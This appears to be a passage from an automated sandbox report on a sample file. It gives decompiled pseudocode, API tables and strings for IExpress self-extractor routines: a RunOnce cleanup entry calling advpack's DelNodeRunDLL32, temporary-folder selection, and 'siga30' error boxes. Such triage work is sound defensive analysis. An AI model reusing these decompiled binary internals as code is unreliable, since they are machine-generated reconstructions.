							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E008A44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E008A658A( &_v268, 0x104, 0x8a1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x8a8530 = _t66;
				goto L23;
			}

0x008a202a
0x008a2035
0x008a203c
0x008a2041
0x008a2050
0x008a205f
0x008a2064
0x008a206f
0x008a208c
0x008a2094
0x008a2257
0x008a2266
0x008a2266
0x008a209a
0x008a209b
0x008a209d
0x008a20aa
0x008a20af
0x008a20c9
0x008a20d1
0x00000000
0x00000000
0x008a20d3
0x008a20da
0x00000000
0x00000000
0x00000000
0x008a20da
0x008a20e2
0x008a2103
0x008a210e
0x008a2116
0x008a2122
0x008a2128
0x008a212c
0x008a2179
0x008a2194
0x008a21de
0x008a21e4
0x008a2256
0x008a2256
0x00000000
0x008a2256
0x008a2196
0x008a2196
0x008a219c
0x008a219f
0x008a219f
0x008a21a1
0x008a21a2
0x008a21a6
0x008a21a8
0x008a21b0
0x008a21b0
0x008a21b2
0x008a21b3
0x008a21bc
0x008a21c7
0x008a21cb
0x008a21f1
0x008a21f6
0x008a21fd
0x008a21ff
0x008a21ff
0x008a2204
0x008a2213
0x008a2218
0x008a221d
0x008a221d
0x008a2220
0x008a2220
0x008a2222
0x008a2223
0x008a2229
0x008a223d
0x008a2249
0x008a2250
0x00000000
0x008a2250
0x008a21d2
0x008a21d9
0x00000000
0x008a21d9
0x008a213a
0x008a2141
0x008a2144
0x008a214c
0x00000000
0x00000000
0x008a2163
0x008a2172
0x008a2172
0x00000000
0x008a2163
0x008a20ea
0x008a20f0
0x00000000

APIs

memset.MSVCRT ref: 008A2050
memset.MSVCRT ref: 008A205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 008A208C

Part of subcall function 008A171E: _vsnprintf.MSVCRT ref: 008A1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008A20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008A20EA
GetSystemDirectoryA.KERNEL32 ref: 008A2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008A2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 008A2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008A2144
GetSystemDirectoryA.KERNEL32 ref: 008A215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008A218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008A21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008A21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 008A223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008A2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008A2250

Strings

wextract_cleanup%d, xrefs: 008A209E
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A21A8, 008A2204
%s /D:%s, xrefs: 008A21FF, 008A2210
wextract_cleanup0, xrefs: 008A20A5, 008A20BE, 008A20F0, 008A2232
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 008A2082
advpack.dll, xrefs: 008A2109
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 008A21F6
DelNodeRunDLL32, xrefs: 008A212E

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-607953301
Opcode ID: a5a2a369260358b2cddf75dd85fec9b57332c39d81981ac421881b0355fff1db
Instruction ID: dd99ccf2521227669f143f56b543daf8941b98b6d5dc42546a2b9a6b42756f08
Opcode Fuzzy Hash: a5a2a369260358b2cddf75dd85fec9b57332c39d81981ac421881b0355fff1db
Instruction Fuzzy Hash: 89510171A00614EBFB249B68DC49FFA776CFB53700F0001A4FA59E2D50EB749E49CA60

Uniqueness

Uniqueness Score: -1.00%

Function 008A55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E008A55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t28 ^ _t110;
				_t2 = E008A468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E008A468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x8a9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x8a8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x8a8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E008A6517(_t82, 0x7d2, 0, E008A3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x8a9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x8a91e4;
									_t40 = GetTempPathA(0x104, 0x8a91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E008A1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E008A6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E008A597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E008A2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E008A658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x8a91e4;
																					E008A1781(0x8a91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E008A5467(0x8a91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E008A2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E008A597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E008A5467(0x8a91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x8a91e4;
											_t70 = E008A2630(0, 0x8a91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x8a91e4;
												_t71 = E008A5467(0x8a91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E008A597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x8a8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E008A5467(0x8a8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E008A44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E008A44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x8a9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E008A44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x8a9124 = E008A6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E008A6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x008a55ab
0x008a55b2
0x008a55c9
0x008a55d5
0x008a55d9
0x008a5600
0x008a5605
0x008a560a
0x008a560c
0x008a5638
0x008a5641
0x008a5643
0x008a5645
0x008a5645
0x008a564c
0x008a5652
0x008a5657
0x008a5659
0x008a5696
0x008a569c
0x008a589f
0x008a58a7
0x008a58ac
0x008a58b3
0x008a58b5
0x008a56a2
0x008a56a2
0x008a56a8
0x00000000
0x008a56ae
0x008a56ae
0x008a56b9
0x008a56bf
0x008a56c1
0x008a56f3
0x008a56f3
0x008a5705
0x008a570a
0x008a5711
0x008a5717
0x008a5724
0x008a5726
0x008a5729
0x008a5730
0x008a5737
0x008a573d
0x008a5740
0x00000000
0x00000000
0x00000000
0x00000000
0x008a572b
0x008a572b
0x008a572e
0x008a5742
0x008a5742
0x008a5745
0x008a576b
0x008a576b
0x00000000
0x008a5747
0x008a5747
0x008a574d
0x008a574f
0x008a5771
0x008a5771
0x008a5773
0x00000000
0x008a5751
0x008a5751
0x008a5753
0x00000000
0x008a5755
0x008a575b
0x008a5760
0x008a5762
0x00000000
0x008a5764
0x008a5764
0x008a5769
0x008a577e
0x008a577e
0x008a5781
0x008a5788
0x008a578d
0x008a578f
0x008a57b2
0x008a57b8
0x008a57bd
0x008a57bf
0x008a57cd
0x008a57cd
0x008a57dd
0x008a57e3
0x008a57ef
0x008a57f5
0x008a57f8
0x008a580a
0x008a580a
0x008a57fa
0x008a5802
0x008a5802
0x008a580d
0x008a580f
0x008a5830
0x008a5836
0x008a583d
0x008a584b
0x008a5851
0x008a5855
0x008a585a
0x008a585c
0x00000000
0x008a585e
0x008a585e
0x00000000
0x008a585e
0x008a5811
0x008a5817
0x008a5819
0x008a581f
0x00000000
0x008a581f
0x008a5791
0x008a5797
0x008a579c
0x008a579e
0x00000000
0x008a57a0
0x008a57a9
0x008a57ae
0x008a57b0
0x00000000
0x00000000
0x00000000
0x00000000
0x008a57b0
0x008a579e
0x00000000
0x00000000
0x00000000
0x008a5769
0x008a5762
0x008a5753
0x008a574f
0x00000000
0x00000000
0x00000000
0x008a572e
0x00000000
0x008a5864
0x008a5864
0x008a5864
0x008a5717
0x00000000
0x008a56c3
0x008a56c5
0x008a56c9
0x008a56ce
0x008a56d0
0x00000000
0x008a56d6
0x008a56d6
0x008a56d8
0x008a56dd
0x008a56df
0x00000000
0x008a56e1
0x008a56e2
0x008a56e4
0x008a56e6
0x008a56eb
0x008a56ed
0x00000000
0x008a56f3
0x008a56f3
0x00000000
0x008a586c
0x008a5878
0x008a587e
0x008a5882
0x008a5883
0x008a5889
0x008a588e
0x008a588e
0x00000000
0x008a5896
0x008a56ed
0x008a56df
0x008a56d0
0x008a56c1
0x008a56a8
0x008a565b
0x008a565b
0x008a565d
0x008a5669
0x008a5669
0x008a565f
0x008a565f
0x008a5665
0x008a5667
0x00000000
0x00000000
0x008a5667
0x008a566c
0x008a5673
0x008a5678
0x008a567a
0x008a589b
0x008a589b
0x008a5680
0x008a5685
0x008a568c
0x00000000
0x008a568c
0x008a567a
0x008a560e
0x008a5613
0x008a561a
0x008a5620
0x008a5626
0x00000000
0x008a5626
0x008a55db
0x008a55e0
0x008a55e7
0x008a55f1
0x008a55f6
0x008a55f6
0x008a55f6
0x008a58b7
0x008a58c7

APIs

Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46A0
Part of subcall function 008A468F: SizeofResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46A9
Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46C3
Part of subcall function 008A468F: LoadResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46CC
Part of subcall function 008A468F: LockResource.KERNEL32(00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46D3
Part of subcall function 008A468F: memcpy_s.MSVCRT ref: 008A46E5
Part of subcall function 008A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 008A55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 008A5638
LocalFree.KERNEL32(00000000), ref: 008A564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 008A5620

Part of subcall function 008A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
Part of subcall function 008A44B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554

Part of subcall function 008A6285: GetLastError.KERNEL32(008A5BBC), ref: 008A6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008A56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 008A571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 008A5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 008A57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 008A57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 008A5802

Part of subcall function 008A2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 008A2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 008A5830

Part of subcall function 008A6517: FindResourceA.KERNEL32(008A0000,000007D6,00000005), ref: 008A652A
Part of subcall function 008A6517: LoadResource.KERNEL32(008A0000,00000000,?,?,008A2EE8,00000000,008A19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008A6538
Part of subcall function 008A6517: DialogBoxIndirectParamA.USER32(008A0000,00000000,00000547,008A19E0,00000000), ref: 008A6557
Part of subcall function 008A6517: FreeResource.KERNEL32(00000000,?,?,008A2EE8,00000000,008A19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008A6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 008A5878

Part of subcall function 008A597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008A59A8
Part of subcall function 008A597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 008A59AF

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A56AE, 008A56B3, 008A583D
RUNPROGRAM, xrefs: 008A55BD, 008A5600
Z, xrefs: 008A570A
A:\, xrefs: 008A56F4
<None>, xrefs: 008A5632
msdownld.tmp, xrefs: 008A57D3

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-1370313076
Opcode ID: 3f7341c371f7d880b398573ddd2e57cba8bef0982a72caacfa046431e2d90906
Instruction ID: db166dc6bd315490af5ce4cbf379ebf68c9f3a121101abe573b3835c20c0e172
Opcode Fuzzy Hash: 3f7341c371f7d880b398573ddd2e57cba8bef0982a72caacfa046431e2d90906
Instruction Fuzzy Hash: 4C810A70A04A149AFB24AB789C45BFB776DFB67300F040065F586E2D91EFB88DC5CA51

Uniqueness

Uniqueness Score: -1.00%

Function 008A44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E008A44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x8a8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x8a9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E008A1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E008A171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E008A171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E008A681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E008A67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "siga30", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E008A681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E008A67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "siga30", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E008A6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x008a44b9
0x008a44c4
0x008a44cb
0x008a44d8
0x008a44e4
0x008a44eb
0x008a44ee
0x008a44ef
0x008a44ef
0x008a44f1
0x008a44f7
0x008a44f8
0x008a467b
0x008a44fe
0x008a4509
0x008a4518
0x008a4525
0x008a4562
0x008a4568
0x008a4568
0x008a456b
0x008a456b
0x008a456d
0x008a456e
0x008a4572
0x008a4578
0x008a457c
0x008a45cb
0x008a4607
0x008a4607
0x008a460d
0x008a4613
0x008a4617
0x00000000
0x008a461d
0x008a4623
0x008a4626
0x008a4628
0x00000000
0x008a4628
0x008a45cd
0x008a45cd
0x008a45cf
0x008a45cf
0x008a45d2
0x008a45d2
0x008a45d4
0x008a45d5
0x008a45db
0x008a45de
0x008a45e3
0x008a45e9
0x008a45ed
0x00000000
0x008a45f3
0x008a45fd
0x00000000
0x008a4602
0x008a45ed
0x008a457e
0x008a457e
0x008a4580
0x008a4580
0x008a4583
0x008a4583
0x008a4585
0x008a4586
0x008a458a
0x008a458c
0x008a458f
0x008a458f
0x008a4591
0x008a4592
0x008a459b
0x008a459e
0x008a45a3
0x008a45a9
0x008a45ad
0x00000000
0x008a45af
0x008a45af
0x008a45bf
0x008a462d
0x008a4630
0x008a463d
0x008a464e
0x008a464e
0x008a463f
0x008a4640
0x008a4647
0x008a464c
0x00000000
0x00000000
0x008a464c
0x008a4666
0x008a466d
0x008a466f
0x008a4675
0x008a4675
0x008a45ad
0x008a4527
0x008a452e
0x008a453f
0x008a453f
0x008a4530
0x008a4531
0x008a4538
0x008a453d
0x00000000
0x00000000
0x008a453d
0x008a4554
0x008a455a
0x008a455a
0x008a455a
0x008a4525
0x008a468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 008A45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 008A45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 008A460D
MessageBeep.USER32(00000000), ref: 008A4630
MessageBoxA.USER32(?,00000000,siga30,00000000), ref: 008A4666
LocalFree.KERNEL32(00000000), ref: 008A466F

Part of subcall function 008A681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 008A686E
Part of subcall function 008A681F: GetSystemMetrics.USER32(0000004A), ref: 008A68A7
Part of subcall function 008A681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008A68CC
Part of subcall function 008A681F: RegQueryValueExA.ADVAPI32(?,008A1140,00000000,?,?,0000000C), ref: 008A68F4
Part of subcall function 008A681F: RegCloseKey.ADVAPI32(?), ref: 008A6902

Strings

siga30, xrefs: 008A4545, 008A465A
LoadString() Error. Could not load string resource., xrefs: 008A44E4

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$siga30
API String ID: 3244514340-1850386852
Opcode ID: 8747c7acdb87bd2aadce711c2285b762e8cd24ac3bd695b0ffaec0124b325627
Instruction ID: a40913f9779a2046e3a89a2ad3a10dd8ddd87ed35b2021411e96b3af59b0a565
Opcode Fuzzy Hash: 8747c7acdb87bd2aadce711c2285b762e8cd24ac3bd695b0ffaec0124b325627
Instruction Fuzzy Hash: 9351F272900219ABFF219F28CC48BAABB68FF87300F145194F919E3A41DBB5DD05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008A53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E008A53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E008A171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E008A1680(_t32, 0x104, _t20);
					E008A658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
